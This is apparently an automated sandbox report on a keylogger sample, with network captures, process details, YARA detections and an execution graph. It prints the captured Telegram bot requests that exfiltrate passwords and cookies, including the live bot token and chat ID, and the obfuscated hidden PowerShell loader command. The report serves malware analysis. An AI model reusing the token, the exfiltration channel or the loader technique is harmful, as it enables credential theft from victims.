2024-12-16 15:33:54 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49880 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8000 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 15:33:56 UTC | 349 bytes | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20and%20Time:%2017/12/2024%20/%2018:38:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-12-16 15:33:57 UTC | 344 bytes | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 16 Dec 2024 15:33:56 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 15:33:57 UTC | 55 bytes | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49901 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8000 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 15:34:04 UTC | 344 bytes | OUT | POST /bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f520a1e05ec
Host: api.telegram.org
Content-Length: 581
2024-12-16 15:34:04 UTC | 581 bytes | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 35 32 30 61 31 65 30 35 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 37 34 35 37 37 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 33 3a 32 34 0d
Data Ascii: --------------------------8dd1f520a1e05ecContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:745773Date and Time: 16/12/2024 / 10:33:24
2024-12-16 15:34:05 UTC | 388 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 16 Dec 2024 15:34:04 GMT
Content-Type: application/json
Content-Length: 527
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 15:34:05 UTC | 527 bytes | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 36 38 39 31 33 33 37 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 6f 6c 66 6c 6f 67 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 37 36 33 39 35 38 31 39 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 76 69 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 41 6c 70 68 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 6f 6c 66 5f 6c 6f 67 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 36 33 32 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22
Data Ascii: {"ok":true,"result":{"message_id":46,"from":{"id":7268913379,"is_bot":true,"first_name":"Logs","username":"wolflogsbot"},"chat":{"id":7763958191,"first_name":"David","last_name":"Alpha","username":"wolf_logs","type":"private"},"date":1734363244,"document"


Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49907 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 8000 | Process: C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 15:34:08 UTC | 350 bytes | OUT | POST /bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f7597775302
Host: api.telegram.org
Content-Length: 7046
2024-12-16 15:34:08 UTC | 7046 bytes | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 37 35 39 37 37 37 35 33 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 37 34 35 37 37 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f
Data Ascii: --------------------------8dd1f7597775302Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:745773Date and Time: 16/12/2024 /
2024-12-16 15:34:08 UTC | 388 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 16 Dec 2024 15:34:08 GMT
Content-Type: application/json
Content-Length: 538
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 15:34:08 UTC | 538 bytes | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 36 38 39 31 33 33 37 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 6f 6c 66 6c 6f 67 73 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 37 36 33 39 35 38 31 39 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 76 69 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 41 6c 70 68 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 6f 6c 66 5f 6c 6f 67 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 36 33 32 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22
Data Ascii: {"ok":true,"result":{"message_id":47,"from":{"id":7268913379,"is_bot":true,"first_name":"Logs","username":"wolflogsbot"},"chat":{"id":7763958191,"first_name":"David","last_name":"Alpha","username":"wolf_logs","type":"private"},"date":1734363248,"document"



Target ID: 0
Start time: 10:32:01
Start date: 16/12/2024
Path: C:\Users\user\Desktop\pedido-035241.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\pedido-035241.exe"
Imagebase: 0x400000
File size: 1'093'536 bytes
MD5 hash: 68AD57514CFB4E1CB4529556DBBC9B73
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 10:32:04
Start date: 16/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) "
Imagebase: 0x6c0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 10:32:04
Start date: 16/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 10:33:03
Start date: 16/12/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\msiexec.exe"
Imagebase: 0xb50000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2962912276.0000000004C2B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false


Execution Graph

Execution Coverage:22.2%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:17%
Total number of Nodes:1383
Total number of Limit Nodes:34
execution_graph: [rendered graph data omitted; the graph covers 1383 nodes (34 limit nodes) of functions in the 0x401000-0x4073ed range, with leaf nodes naming the Windows APIs each function calls, among them FindFirstFileW/FindNextFileW/DeleteFileW/RemoveDirectoryW/SetFileAttributesW, CreateFileW/ReadFile/WriteFile/SetFilePointer/MoveFileExW/CopyFileW/CompareFileTime/SetFileTime, RegOpenKeyExW/RegQueryValueExW, GetModuleHandleA/LoadLibraryExW/GetProcAddress, GetTempPathW/GetTempFileNameW, GetPrivateProfileStringW, OleInitialize, CreateDialogParamW/DialogBoxParamW/MessageBoxIndirectW, SHFileOperationW/SHBrowseForFolderW, and OpenProcessToken/LookupPrivilegeValueW/AdjustTokenPrivileges/ExitWindowsEx]
3639 40248a 3640 402da6 17 API calls 3639->3640 3641 40249c 3640->3641 3642 402da6 17 API calls 3641->3642 3643 4024a6 3642->3643 3656 402e36 3643->3656 3646 40292e 3647 4024de 3649 4024ea 3647->3649 3681 402d84 3647->3681 3648 402da6 17 API calls 3651 4024d4 lstrlenW 3648->3651 3650 402509 RegSetValueExW 3649->3650 3660 4032b4 3649->3660 3654 40251f RegCloseKey 3650->3654 3651->3647 3654->3646 3657 402e51 3656->3657 3684 4063a2 3657->3684 3661 4032cd 3660->3661 3662 4032f8 3661->3662 3698 4034af SetFilePointer 3661->3698 3688 403499 3662->3688 3666 403423 3666->3650 3667 403315 GetTickCount 3677 403328 3667->3677 3668 403439 3669 40343d 3668->3669 3673 403455 3668->3673 3670 403499 ReadFile 3669->3670 3670->3666 3671 403499 ReadFile 3671->3673 3672 403499 ReadFile 3672->3677 3673->3666 3673->3671 3674 4060a9 WriteFile 3673->3674 3674->3673 3676 40338e GetTickCount 3676->3677 3677->3666 3677->3672 3677->3676 3678 4033b7 MulDiv wsprintfW 3677->3678 3680 4060a9 WriteFile 3677->3680 3691 406a4f 3677->3691 3679 405569 24 API calls 3678->3679 3679->3677 3680->3677 3682 406544 17 API calls 3681->3682 3683 402d99 3682->3683 3683->3649 3685 4063b1 3684->3685 3686 4024b6 3685->3686 3687 4063bc RegCreateKeyExW 3685->3687 3686->3646 3686->3647 3686->3648 3687->3686 3689 40607a ReadFile 3688->3689 3690 403303 3689->3690 3690->3666 3690->3667 3690->3668 3692 406a74 3691->3692 3695 406a7c 3691->3695 3692->3677 3693 406b03 GlobalFree 3694 406b0c GlobalAlloc 3693->3694 3694->3692 3694->3695 3695->3692 3695->3693 3695->3694 3696 406b83 GlobalAlloc 3695->3696 3697 406b7a GlobalFree 3695->3697 3696->3692 3696->3695 3697->3696 3698->3662 4563 40290b 4564 402da6 17 API calls 4563->4564 4565 402912 FindFirstFileW 4564->4565 4566 40293a 4565->4566 4569 402925 4565->4569 4571 40644e wsprintfW 4566->4571 4568 402943 4572 406507 lstrcpynW 4568->4572 4571->4568 4572->4569 4573 40190c 4574 401943 4573->4574 4575 402da6 17 API calls 4574->4575 4576 401948 4575->4576 4577 405c13 67 API calls 
4576->4577 4578 401951 4577->4578 4579 40490d 4580 404943 4579->4580 4581 40491d 4579->4581 4583 4044ca 8 API calls 4580->4583 4582 404463 18 API calls 4581->4582 4584 40492a SetDlgItemTextW 4582->4584 4585 40494f 4583->4585 4584->4580 4586 40190f 4587 402da6 17 API calls 4586->4587 4588 401916 4587->4588 4589 405b67 MessageBoxIndirectW 4588->4589 4590 40191f 4589->4590 4591 401491 4592 405569 24 API calls 4591->4592 4593 401498 4592->4593 4594 402891 4595 402898 4594->4595 4597 402ba9 4594->4597 4596 402d84 17 API calls 4595->4596 4598 40289f 4596->4598 4599 4028ae SetFilePointer 4598->4599 4599->4597 4600 4028be 4599->4600 4602 40644e wsprintfW 4600->4602 4602->4597 4603 401f12 4604 402da6 17 API calls 4603->4604 4605 401f18 4604->4605 4606 402da6 17 API calls 4605->4606 4607 401f21 4606->4607 4608 402da6 17 API calls 4607->4608 4609 401f2a 4608->4609 4610 402da6 17 API calls 4609->4610 4611 401f33 4610->4611 4612 401423 24 API calls 4611->4612 4613 401f3a 4612->4613 4620 405b2d ShellExecuteExW 4613->4620 4615 401f82 4616 40292e 4615->4616 4617 40697f 5 API calls 4615->4617 4618 401f9f CloseHandle 4617->4618 4618->4616 4620->4615 4621 402f93 4622 402fa5 SetTimer 4621->4622 4623 402fbe 4621->4623 4622->4623 4624 403013 4623->4624 4625 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4623->4625 4625->4624 4626 401d17 4627 402d84 17 API calls 4626->4627 4628 401d1d IsWindow 4627->4628 4629 401a20 4628->4629 4630 404599 lstrcpynW lstrlenW 4014 401b9b 4015 401bec 4014->4015 4020 401ba8 4014->4020 4016 401c16 GlobalAlloc 4015->4016 4017 401bf1 4015->4017 4018 406544 17 API calls 4016->4018 4027 40239d 4017->4027 4035 406507 lstrcpynW 4017->4035 4022 401c31 4018->4022 4019 406544 17 API calls 4023 402397 4019->4023 4020->4022 4024 401bbf 4020->4024 4022->4019 4022->4027 4028 405b67 MessageBoxIndirectW 4023->4028 4033 406507 lstrcpynW 4024->4033 4025 401c03 GlobalFree 4025->4027 4028->4027 4029 401bce 4034 406507 lstrcpynW 4029->4034 4031 401bdd 4036 406507 
lstrcpynW 4031->4036 4033->4029 4034->4031 4035->4025 4036->4027 4631 40261c 4632 402da6 17 API calls 4631->4632 4633 402623 4632->4633 4636 405ff7 GetFileAttributesW CreateFileW 4633->4636 4635 40262f 4636->4635 4051 40259e 4062 402de6 4051->4062 4054 402d84 17 API calls 4055 4025b1 4054->4055 4056 4025d9 RegEnumValueW 4055->4056 4057 4025cd RegEnumKeyW 4055->4057 4060 40292e 4055->4060 4058 4025f5 RegCloseKey 4056->4058 4059 4025ee 4056->4059 4057->4058 4058->4060 4059->4058 4063 402da6 17 API calls 4062->4063 4064 402dfd 4063->4064 4065 406374 RegOpenKeyExW 4064->4065 4066 4025a8 4065->4066 4066->4054 4644 40149e 4645 4014ac PostQuitMessage 4644->4645 4646 40239d 4644->4646 4645->4646 4647 404622 4648 40463a 4647->4648 4655 404754 4647->4655 4652 404463 18 API calls 4648->4652 4649 4047be 4650 404888 4649->4650 4651 4047c8 GetDlgItem 4649->4651 4658 4044ca 8 API calls 4650->4658 4653 4047e2 4651->4653 4654 404849 4651->4654 4657 4046a1 4652->4657 4653->4654 4662 404808 SendMessageW LoadCursorW SetCursor 4653->4662 4654->4650 4663 40485b 4654->4663 4655->4649 4655->4650 4656 40478f GetDlgItem SendMessageW 4655->4656 4680 404485 KiUserCallbackDispatcher 4656->4680 4660 404463 18 API calls 4657->4660 4661 404883 4658->4661 4665 4046ae CheckDlgButton 4660->4665 4681 4048d1 4662->4681 4667 404871 4663->4667 4668 404861 SendMessageW 4663->4668 4664 4047b9 4670 4048ad SendMessageW 4664->4670 4678 404485 KiUserCallbackDispatcher 4665->4678 4667->4661 4669 404877 SendMessageW 4667->4669 4668->4667 4669->4661 4670->4649 4673 4046cc GetDlgItem 4679 404498 SendMessageW 4673->4679 4675 4046e2 SendMessageW 4676 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4675->4676 4677 4046ff GetSysColor 4675->4677 4676->4661 4677->4676 4678->4673 4679->4675 4680->4664 4684 405b2d ShellExecuteExW 4681->4684 4683 404837 LoadCursorW SetCursor 4683->4654 4684->4683 3443 4015a3 3444 402da6 17 API calls 3443->3444 3445 4015aa SetFileAttributesW 3444->3445 3446 4015bc 
3445->3446 3556 401fa4 3557 402da6 17 API calls 3556->3557 3558 401faa 3557->3558 3559 405569 24 API calls 3558->3559 3560 401fb4 3559->3560 3571 405aea CreateProcessW 3560->3571 3565 401fcf 3567 401fd4 3565->3567 3568 401fdf 3565->3568 3566 40292e 3579 40644e wsprintfW 3567->3579 3570 401fdd CloseHandle 3568->3570 3570->3566 3572 401fba 3571->3572 3573 405b1d CloseHandle 3571->3573 3572->3566 3572->3570 3574 40697f WaitForSingleObject 3572->3574 3573->3572 3575 406999 3574->3575 3576 4069ab GetExitCodeProcess 3575->3576 3580 406910 3575->3580 3576->3565 3579->3570 3581 40692d PeekMessageW 3580->3581 3582 406923 DispatchMessageW 3581->3582 3583 40693d WaitForSingleObject 3581->3583 3582->3581 3583->3575 3584 4056a8 3585 405852 3584->3585 3586 4056c9 GetDlgItem GetDlgItem GetDlgItem 3584->3586 3588 405883 3585->3588 3589 40585b GetDlgItem CreateThread CloseHandle 3585->3589 3629 404498 SendMessageW 3586->3629 3591 4058ae 3588->3591 3593 4058d3 3588->3593 3594 40589a ShowWindow ShowWindow 3588->3594 3589->3588 3632 40563c OleInitialize 3589->3632 3590 405739 3598 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3590->3598 3592 40590e 3591->3592 3595 4058c2 3591->3595 3596 4058e8 ShowWindow 3591->3596 3592->3593 3606 40591c SendMessageW 3592->3606 3597 4044ca 8 API calls 3593->3597 3631 404498 SendMessageW 3594->3631 3600 40443c SendMessageW 3595->3600 3602 405908 3596->3602 3603 4058fa 3596->3603 3601 4058e1 3597->3601 3604 405792 SendMessageW SendMessageW 3598->3604 3605 4057ae 3598->3605 3600->3593 3608 40443c SendMessageW 3602->3608 3607 405569 24 API calls 3603->3607 3604->3605 3609 4057c1 3605->3609 3610 4057b3 SendMessageW 3605->3610 3606->3601 3611 405935 CreatePopupMenu 3606->3611 3607->3602 3608->3592 3612 404463 18 API calls 3609->3612 3610->3609 3613 406544 17 API calls 3611->3613 3615 4057d1 3612->3615 3614 405945 AppendMenuW 3613->3614 3616 405962 GetWindowRect 3614->3616 3617 405975 TrackPopupMenu 3614->3617 3618 4057da ShowWindow 
3615->3618 3619 40580e GetDlgItem SendMessageW 3615->3619 3616->3617 3617->3601 3620 405990 3617->3620 3621 4057f0 ShowWindow 3618->3621 3622 4057fd 3618->3622 3619->3601 3623 405835 SendMessageW SendMessageW 3619->3623 3624 4059ac SendMessageW 3620->3624 3621->3622 3630 404498 SendMessageW 3622->3630 3623->3601 3624->3624 3625 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3624->3625 3627 4059ee SendMessageW 3625->3627 3627->3627 3628 405a17 GlobalUnlock SetClipboardData CloseClipboard 3627->3628 3628->3601 3629->3590 3630->3619 3631->3591 3633 4044af SendMessageW 3632->3633 3634 40565f 3633->3634 3637 401389 2 API calls 3634->3637 3638 405686 3634->3638 3635 4044af SendMessageW 3636 405698 CoUninitialize 3635->3636 3637->3634 3638->3635 4685 40202a 4686 402da6 17 API calls 4685->4686 4687 402031 4686->4687 4688 4068d4 5 API calls 4687->4688 4689 402040 4688->4689 4690 4020cc 4689->4690 4691 40205c GlobalAlloc 4689->4691 4691->4690 4692 402070 4691->4692 4693 4068d4 5 API calls 4692->4693 4694 402077 4693->4694 4695 4068d4 5 API calls 4694->4695 4696 402081 4695->4696 4696->4690 4700 40644e wsprintfW 4696->4700 4698 4020ba 4701 40644e wsprintfW 4698->4701 4700->4698 4701->4690 4702 40252a 4703 402de6 17 API calls 4702->4703 4704 402534 4703->4704 4705 402da6 17 API calls 4704->4705 4706 40253d 4705->4706 4707 402548 RegQueryValueExW 4706->4707 4709 40292e 4706->4709 4708 402568 4707->4708 4710 40256e RegCloseKey 4707->4710 4708->4710 4713 40644e wsprintfW 4708->4713 4710->4709 4713->4710 4714 404caa 4715 404cd6 4714->4715 4716 404cba 4714->4716 4718 404d09 4715->4718 4719 404cdc SHGetPathFromIDListW 4715->4719 4725 405b4b GetDlgItemTextW 4716->4725 4721 404cec 4719->4721 4724 404cf3 SendMessageW 4719->4724 4720 404cc7 SendMessageW 4720->4715 4722 40140b 2 API calls 4721->4722 4722->4724 4724->4718 4725->4720 4726 4021aa 4727 402da6 17 API calls 4726->4727 4728 4021b1 4727->4728 4729 402da6 17 API calls 4728->4729 4730 4021bb 4729->4730 4731 402da6 17 
API calls 4730->4731 4732 4021c5 4731->4732 4733 402da6 17 API calls 4732->4733 4734 4021cf 4733->4734 4735 402da6 17 API calls 4734->4735 4736 4021d9 4735->4736 4737 402218 CoCreateInstance 4736->4737 4738 402da6 17 API calls 4736->4738 4741 402237 4737->4741 4738->4737 4739 401423 24 API calls 4740 4022f6 4739->4740 4741->4739 4741->4740 4742 401a30 4743 402da6 17 API calls 4742->4743 4744 401a39 ExpandEnvironmentStringsW 4743->4744 4745 401a4d 4744->4745 4747 401a60 4744->4747 4746 401a52 lstrcmpW 4745->4746 4745->4747 4746->4747 3744 4023b2 3745 4023c0 3744->3745 3746 4023ba 3744->3746 3748 402da6 17 API calls 3745->3748 3750 4023ce 3745->3750 3747 402da6 17 API calls 3746->3747 3747->3745 3748->3750 3749 402da6 17 API calls 3753 4023e5 WritePrivateProfileStringW 3749->3753 3751 402da6 17 API calls 3750->3751 3752 4023dc 3750->3752 3751->3752 3752->3749 4760 402434 4761 402467 4760->4761 4762 40243c 4760->4762 4763 402da6 17 API calls 4761->4763 4764 402de6 17 API calls 4762->4764 4765 40246e 4763->4765 4766 402443 4764->4766 4771 402e64 4765->4771 4768 402da6 17 API calls 4766->4768 4770 40247b 4766->4770 4769 402454 RegDeleteValueW RegCloseKey 4768->4769 4769->4770 4772 402e78 4771->4772 4774 402e71 4771->4774 4772->4774 4775 402ea9 4772->4775 4774->4770 4776 406374 RegOpenKeyExW 4775->4776 4777 402ed7 4776->4777 4778 402ee7 RegEnumValueW 4777->4778 4779 402f0a 4777->4779 4786 402f81 4777->4786 4778->4779 4780 402f71 RegCloseKey 4778->4780 4779->4780 4781 402f46 RegEnumKeyW 4779->4781 4782 402f4f RegCloseKey 4779->4782 4784 402ea9 6 API calls 4779->4784 4780->4786 4781->4779 4781->4782 4783 4068d4 5 API calls 4782->4783 4785 402f5f 4783->4785 4784->4779 4785->4786 4787 402f63 RegDeleteKeyW 4785->4787 4786->4774 4787->4786 4795 401735 4796 402da6 17 API calls 4795->4796 4797 40173c SearchPathW 4796->4797 4798 401757 4797->4798 4799 401d38 4800 402d84 17 API calls 4799->4800 4801 401d3f 4800->4801 4802 402d84 17 API calls 4801->4802 4803 401d4b GetDlgItem 
4802->4803 4804 402638 4803->4804 4805 4014b8 4806 4014be 4805->4806 4807 401389 2 API calls 4806->4807 4808 4014c6 4807->4808 4816 40263e 4817 402652 4816->4817 4818 40266d 4816->4818 4821 402d84 17 API calls 4817->4821 4819 402672 4818->4819 4820 40269d 4818->4820 4822 402da6 17 API calls 4819->4822 4823 402da6 17 API calls 4820->4823 4828 402659 4821->4828 4824 402679 4822->4824 4825 4026a4 lstrlenW 4823->4825 4833 406529 WideCharToMultiByte 4824->4833 4825->4828 4827 40268d lstrlenA 4827->4828 4829 4026e7 4828->4829 4830 4026d1 4828->4830 4832 4060d8 5 API calls 4828->4832 4830->4829 4831 4060a9 WriteFile 4830->4831 4831->4829 4832->4830 4833->4827

Control-flow Graph

• Executed
• Not Executed
control_flow_graph: function starting at 4034f7 (basic-block edge list with API names such as SetErrorMode, GetVersionExW, OleInitialize, GetTempPathW, SetEnvironmentVariableW, CopyFileW, AdjustTokenPrivileges, ExitWindowsEx and ExitProcess; rendered as a graph in the original report and not reproduced as text)
APIs
• SetErrorMode.KERNELBASE(00008001), ref: 0040351A
• GetVersionExW.KERNEL32(?), ref: 00403543
• GetVersionExW.KERNEL32(0000011C), ref: 0040355A
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
• #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
• OleInitialize.OLE32(00000000), ref: 00403634
• SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
• GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
